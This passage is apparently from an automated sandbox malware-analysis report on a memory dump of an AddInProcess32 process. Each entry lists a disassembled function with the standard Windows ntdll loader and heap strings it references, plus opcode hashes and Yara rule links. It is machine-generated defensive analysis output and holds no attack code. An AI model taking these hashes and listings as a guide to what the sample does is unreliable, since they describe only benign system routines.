Opcode Fuzzy Hash: 25ff75a5864d9330e9ab6d10b9dd17a4aea346c16b6f8efdb4f2c09b56e21238
Instruction Fuzzy Hash: 4A915870A013529BEB36DF98D855BAE7BA5BB50B10F11402EEA11BF3F1D7B09802C791

Function 0153F0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0153F33E
Just allocated block at %p for %Ix bytes, xrefs: 0153F288
HEAP[%wZ]: , xrefs: 0153F267, 0153F314, 0153F36B
RtlAllocateHeap, xrefs: 0153F0ED
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0153F389
HEAP: , xrefs: 0153F274, 0153F321, 0153F378

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 6dc0316647e66b4a32b0b7628eeea58237a391398a5a2bcf73ad4c85751d0cb1
Instruction ID: 04c7a759d26bbe89a1e34fc23c5785d6f98ee3e21c90b420182e1dd872fdba85
Opcode Fuzzy Hash: 6dc0316647e66b4a32b0b7628eeea58237a391398a5a2bcf73ad4c85751d0cb1
Instruction Fuzzy Hash: 5E912031A00646DFDB12EFA9D440AADBBF1FFA9710F18844FE445AF261C7369941CB12

Function 0148640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 014E9790
minkernel\ntdll\ldrinit.c, xrefs: 014E97A0, 014E97C9
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014E977C
apphelp.dll, xrefs: 01486446
LdrpInitShimEngine, xrefs: 014E9783, 014E9796, 014E97BF
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014E97B9

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 4115195e0243f8cd23cf54fb1b3a75d9f894ee6def4a8242735bf2e50aff75fa
Instruction ID: 93ccde2aaf63087d570f3d4df810c5c27540aea6223426e36a750b235754e138
Opcode Fuzzy Hash: 4115195e0243f8cd23cf54fb1b3a75d9f894ee6def4a8242735bf2e50aff75fa
Instruction Fuzzy Hash: D951D3712483019FE321EF25D895EAF77D8FB94608F11091FF9959B2B0E630D909CB92

Function 014CC5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 014CC5E3
minkernel\ntdll\ldrredirect.c, xrefs: 01507F8C, 01508000
Unable to build import redirection Table, Status = 0x%x, xrefs: 01507FF0
Loading import redirection DLL: '%wZ', xrefs: 01507F7B
LdrpInitializeProcess, xrefs: 014CC5E4
LdrpInitializeImportRedirection, xrefs: 01507F82, 01507FF6

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: a66c088ae8f37d9f70a92570db32503b7fd12f24378c4b528d05b885cfbc5968
Instruction ID: e2aea87f6bb7c9454ca0dd497f49f3daf1eab88de6fae73e8143e47a7b790c12
Opcode Fuzzy Hash: a66c088ae8f37d9f70a92570db32503b7fd12f24378c4b528d05b885cfbc5968
Instruction Fuzzy Hash: 203127716043029BC225EF69D895E6EBB94FFA4B10F01055EF984AF2B1D630EC04C7A2

Function 014C2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01501F82
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01501FA9
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01501FC9
SXS: %s() passed the empty activation context, xrefs: 01501F6F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01501F8A
RtlGetAssemblyStorageRoot, xrefs: 01501F6A, 01501FA4, 01501FC4

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 090bb82a0bf0dc5dd9d1bc418da402146796d0594406e681b1c6107f3c98893a
Instruction ID: 6d8f0b603ccac8e0a207320366212bcb7f1c575427f67fd5330df6d10b3ff228
Opcode Fuzzy Hash: 090bb82a0bf0dc5dd9d1bc418da402146796d0594406e681b1c6107f3c98893a
Instruction Fuzzy Hash: C6313976B006157BF7128ACA8C85F9B7A68EB60F54F15005EBA147B264C3F0EA00C6F1

Function 014B510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 014B514A
Kernel-MUI-Language-Allowed, xrefs: 014B519B
Kernel-MUI-Number-Allowed, xrefs: 014B5167
Kernel-MUI-Language-Disallowed, xrefs: 014B5272
Kernel-MUI-Language-SKU, xrefs: 014B534B

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 79dfd34079171383bb4d40d6e375391d0f36fea6c30e38e92f2f1e11a35a7fa1
Instruction ID: d3a00bcae4ca1489c83b442a689c32a4c6df5d03144b1366cb44b01bdae1f5fc
Opcode Fuzzy Hash: 79dfd34079171383bb4d40d6e375391d0f36fea6c30e38e92f2f1e11a35a7fa1
Instruction Fuzzy Hash: 86F12C72D01219EFCB15DF99C980AEFBBB9FF19650F15406BE505AB320E7749E018BA0

Function 0149A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0149A317
LdrResFallbackLangList Enter, xrefs: 0149A30F
8, xrefs: 0149A307
LdrResFallbackLangList Exit, xrefs: 0149A31F

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 6fdcf3de2c8a59bee9c61d96f5079352f53c84ebdf8af865c22678ab34285ca0
Instruction ID: e886f4ec56769f36a757d92758b5357212d763070ce4ff485bf6bf40f23ac48f
Opcode Fuzzy Hash: 6fdcf3de2c8a59bee9c61d96f5079352f53c84ebdf8af865c22678ab34285ca0
Instruction Fuzzy Hash: 67C158702083828BDB21CF59C144B6BBBE4BF85704F14896FF9968B361E774C94ACB56

Function 014C8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 014C84B1
minkernel\ntdll\ldrinit.c, xrefs: 014C8341
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014C847E
LdrpInitializeProcess, xrefs: 014C8342

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 70ef3adde469e0aacc75df21b8f84c6fc2a2a5ae4fbb1006b6ad6e9d8a782301
Instruction ID: 8e413732a346983b794dbd6b72e6f252c9e74ca461de5e275dc3f0b7b576ce23
Opcode Fuzzy Hash: 70ef3adde469e0aacc75df21b8f84c6fc2a2a5ae4fbb1006b6ad6e9d8a782301
Instruction Fuzzy Hash: 61919E71108342AFD762DE65C850EAFBBECFFA4A44F40092FF68596261E374D904CB66

Function 014963CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 014F0E2F
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014F0EB5
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 014F0DEC
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 014F0E72

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 14548be6b22e57345e81b001ddb36c464f79bba003ede5ebccd061df67974580
Instruction ID: eb36ac1812a436c3fd15df4b5b1dc78b2a8f9188d343266067929b97f045ce15
Opcode Fuzzy Hash: 14548be6b22e57345e81b001ddb36c464f79bba003ede5ebccd061df67974580
Instruction Fuzzy Hash: D071D0719043069FCB61EF59C884B9B7FA9EF94760F40046EF9484B2A6C334E589CBD1

Function 0148F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

`, xrefs: 014EE1B7
HEAP[%wZ]: , xrefs: 014EE18D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 014EE2F2
HEAP: , xrefs: 014EE2DD

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 9f5135fbfa64576d0e2cae30ff4776832cd33f83aa366b0b3a3f126eb0fecb69
Instruction ID: 1f7d6c8be805929290581f8dcb0d1328a1378a118acb3d86524efd5c8b839aa8
Opcode Fuzzy Hash: 9f5135fbfa64576d0e2cae30ff4776832cd33f83aa366b0b3a3f126eb0fecb69
Instruction Fuzzy Hash: 86610331204281AFD722DB69C848F6BB7E8FF94754F04055AF958AB3B1D734E845C762

Function 014B237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 014FA7AF
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 014FA79F
apphelp.dll, xrefs: 014B2382
LdrpDynamicShimModule, xrefs: 014FA7A5

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 452f35f5af80e0e798e20bcb9f55487d02b6e595f7712a5274ea217508cf61be
Instruction ID: 6d09f21265c0a872fe1dcedd3ca76c86c5d005ab1ce6f116834d7ea450128977
Opcode Fuzzy Hash: 452f35f5af80e0e798e20bcb9f55487d02b6e595f7712a5274ea217508cf61be
Instruction Fuzzy Hash: 23311A71A00201AFEB21AF59D885EAE77B5FB80B10F25001FEA167F365D6B09946DB50

Function 014890F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 014EB82F, 014EB86C
VirtualQuery Failed 0x%p %x, xrefs: 014EB886
HEAP: , xrefs: 014EB83C, 014EB879
VirtualProtect Failed 0x%p %x, xrefs: 014EB849

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: bc6cf2abcbb19d2747dbd95615aefd5db4df80e9118b24f48ca6aa2e307f0b50
Instruction ID: fba147a81034ddc12e528eeac8d2f06994a5c5a985ae2ebf53c0bc12a0ad700e
Opcode Fuzzy Hash: bc6cf2abcbb19d2747dbd95615aefd5db4df80e9118b24f48ca6aa2e307f0b50
Instruction Fuzzy Hash: FC31C332A00105EFDB11EB59C888FAEB7F8FB54674F1440ABE905AB3B1D770E940CA61

Function 01539060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

0, xrefs: 01539776
, xrefs: 01539704
, xrefs: 01539657

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: e6848a662260d177546ace3c19be4a578f3d0b579ddf93ec9175fc9454fe55af
Instruction ID: 18a5ec54a6fa053bb1a314693ee62fb5b1bbd1903e165dad84fb2f9c28bd3bdf
Opcode Fuzzy Hash: e6848a662260d177546ace3c19be4a578f3d0b579ddf93ec9175fc9454fe55af
Instruction Fuzzy Hash: 5B32E2B16083818FE750CF68C494B5AFBE5BBC8348F04492EF5998B291D7B5E948CB52

Function 01491380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01491648
HEAP[%wZ]: , xrefs: 01491632
HEAP: , xrefs: 014914B6

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e33ea30167534ea43602801eb6eba7b6df4c0d005430f06fed249bf6e98b057e
Instruction ID: 2cf7a33846ffdc3a65fd37c4b5119f30bc36dd767a6114be81fdd4e7539962ca
Opcode Fuzzy Hash: e33ea30167534ea43602801eb6eba7b6df4c0d005430f06fed249bf6e98b057e
Instruction Fuzzy Hash: 04E1F230A042469BDB29CF28C44477ABFF1EF58720F18886EE596CB366E734E945CB50

Function 014BF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015000C7
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015000F1
RTL: Re-Waiting, xrefs: 01500128

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: ab5e543b27ae84fea1d8768d9c804f25ac8580bc4978d1a5da12b86a46592c40
Instruction ID: f54c420146fd424c2d2a9965678c62d25b1e17fa6911429b3d2a92a4c0682069
Opcode Fuzzy Hash: ab5e543b27ae84fea1d8768d9c804f25ac8580bc4978d1a5da12b86a46592c40
Instruction Fuzzy Hash: 30E1D1316087429FD726CF2CC884B5ABBE0BB84314F140A5EF5A98B3E1D774D949CB62

Function 0149B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 0149B622
MUI, xrefs: 0149B5F8, 0149B707
LdrResGetRCConfig Exit, xrefs: 0149B634

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 68d782a7fa04e66f51eb1150aeb363f927c45d58de2b861579bfcdf33cb46eed
Instruction ID: a202306636de9d1a8a09e651e81c6144ac3a4b3c5df9ab042ab44d93662506d6
Opcode Fuzzy Hash: 68d782a7fa04e66f51eb1150aeb363f927c45d58de2b861579bfcdf33cb46eed
Instruction Fuzzy Hash: AEB18B31A006058BEF25CF69D990BAEBBB5FF84714F14852EEA19DB7A0D730E841CB51

Function 0151330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

@, xrefs: 0151351F
\SystemRoot\system32\, xrefs: 015134C2
DelegatedNtdll, xrefs: 0151334E

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: fb6028b5de6d1ca57bf2502f2351198a35e3fda7673d37a3a4e7294a06d7cf13
Instruction ID: 657bffc9523124f5a848b767d3cdc7f652b62573d12c77f6a36c3799408e70cf
Opcode Fuzzy Hash: fb6028b5de6d1ca57bf2502f2351198a35e3fda7673d37a3a4e7294a06d7cf13
Instruction Fuzzy Hash: F5B18271604341AFF762DF55C894F6BB7E8BB54720F01092AFA509F294D774E808CB92

Function 0148A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 014EC075
\??\, xrefs: 014EBF73
UseFilter, xrefs: 0148A171

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 1f4da223856df0468f49b970a267004a4ee6f91bc1fe88d68ea65e98fb3a3392
Instruction ID: 86a8694372910bf5f8faae10fd8ab20d8919da3802f6b6188b07d702ba032278
Opcode Fuzzy Hash: 1f4da223856df0468f49b970a267004a4ee6f91bc1fe88d68ea65e98fb3a3392
Instruction Fuzzy Hash: F2A16D719012299BDB31DF68CC98BAEB7B8EF14701F1005EBEA08A7260D7759E85CF50

Function 0152327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Exit, xrefs: 015232B7
LdrpResMapFile Enter, xrefs: 015232A5
@, xrefs: 015233F7

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: db591ebc3350c9377f35341e71fd3369218eb8888c1b7d639194a9de4d85408d
Instruction ID: 102921b8fdab9c2c7210921cc68da86001a3df2767d4d173209954b2a778f64c
Opcode Fuzzy Hash: db591ebc3350c9377f35341e71fd3369218eb8888c1b7d639194a9de4d85408d
Instruction Fuzzy Hash: FD819172208351AFE751CB19C844B6EBBE8FF99B50F04096DFA459B390DB78D900CB52

Function 0149B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 0149B385
{, xrefs: 014F35BD
LdrpResGetResourceDirectory Exit, xrefs: 0149B397

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: cbb6cdaa7d359b7768af7bcd69a8d900887d7a7709d50af51b2b416a63b6d05d
Instruction ID: 4d7ed04f90a5674bf065611908d04be707eeba245660df0a32617f76a7be9410
Opcode Fuzzy Hash: cbb6cdaa7d359b7768af7bcd69a8d900887d7a7709d50af51b2b416a63b6d05d
Instruction Fuzzy Hash: CA91C171A04259CFEF21CF58E444BAEBBB0FF44328F14459BE915AB3A0D3789A41CB91

Function 0156B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

GlobalizationUserSettings, xrefs: 0156B3B4
TargetNtPath, xrefs: 0156B3AF
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0156B3AA

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 383296d24b58d0b09347132941cde02baa6fd5a78aaf26a33a34e19899eaea4a
Instruction ID: 44aaa05d03c5b24cec817b1108c06be27177477cbbb609f852ebbf576b7c5f3f
Opcode Fuzzy Hash: 383296d24b58d0b09347132941cde02baa6fd5a78aaf26a33a34e19899eaea4a
Instruction Fuzzy Hash: EF617571A412299BDB31DF55DC88BD9B7B8BB24711F0101E9EA08EB260D774DE84CF90

Function 014B9723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 014FDAFF
Unmapping DLL "%wZ", xrefs: 014FDAEE
LdrpUnloadNode, xrefs: 014FDAF5

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 0-2283098728
Opcode ID: 6dba0d03b123c6c961a41ec4cb098520eefe109086a63819058fbd086c12cc09
Instruction ID: ea5ee2deb01397484167f13b20254c4e1d01b4a2c8bdb4653161f2f18e84c708
Opcode Fuzzy Hash: 6dba0d03b123c6c961a41ec4cb098520eefe109086a63819058fbd086c12cc09
Instruction Fuzzy Hash: F95109B1700302DBD725EF39C8C4AAA77E1BBA4718F15062FE6529B7B1E7709405C7A1

Function 0148F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 014EE455
HEAP[%wZ]: , xrefs: 014EE435
HEAP: , xrefs: 014EE442

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 7506c6f9f04e95b97bd5507cdaeaf6c3729d93b6f37209e0d10ed24369f231d2
Instruction ID: 14479a3e371ab2a97599e5cf804f23d904f27eb14182d2319a96c3338426e498
Opcode Fuzzy Hash: 7506c6f9f04e95b97bd5507cdaeaf6c3729d93b6f37209e0d10ed24369f231d2
Instruction Fuzzy Hash: 8251F431600685AFE722EBA9C888F6EBBF8FF14704F0444AAE5519B772D374E905CB50

Function 014B1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 014FA3A7
LdrpCompleteMapModule, xrefs: 014FA39D
Could not validate the crypto signature for DLL %wZ, xrefs: 014FA396

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 1f6a0075a2fc5feb81cc0a7624058756a5cee63fd7b8f08b338aed9bed8884c3
Instruction ID: b6e690762c67126d4caa945041f132ee529711aaab6ff7afd16a2025b324563d
Opcode Fuzzy Hash: 1f6a0075a2fc5feb81cc0a7624058756a5cee63fd7b8f08b338aed9bed8884c3
Instruction Fuzzy Hash: A9512830A007419BE722CF5DD994BAA7BE4FB00B14F28056BEA569B3F2D770E901CB54

Function 0148753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 014EAD5A
HEAP[%wZ]: , xrefs: 014EAD3A
HEAP: , xrefs: 014EAD47

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: da9f5cefff93fb00c24559f3d468c271f44c95c5343f720dff9bbc28e37ae0d2
Instruction ID: 2266e9cab2e7877fa554969e35dc3c2588fac98d541914d7d1bd5b7ebb2525e5
Opcode Fuzzy Hash: da9f5cefff93fb00c24559f3d468c271f44c95c5343f720dff9bbc28e37ae0d2
Instruction Fuzzy Hash: 9241E6346002408FEF25EA1DC0ACB7A7BD5AF1121BF3844ABD64A9B776C676D447CB21

Function 014C15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

LdrpAllocateTls, xrefs: 0150194A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 01501943
minkernel\ntdll\ldrtls.c, xrefs: 01501954

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: c707cf00fb68a9a634248591dc9d7892849dd653a9a34171f2f6c51439015c17
Instruction ID: 6eadd29554af540ce58f1692028b5dccdcda31543d32de0c23efe7a27663f9d0
Opcode Fuzzy Hash: c707cf00fb68a9a634248591dc9d7892849dd653a9a34171f2f6c51439015c17
Instruction Fuzzy Hash: FC419C75A00606EFDB15DFA9D881AAEBBF1FF58B00F15851EE405AB361D734A901CB90

Function 015143D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

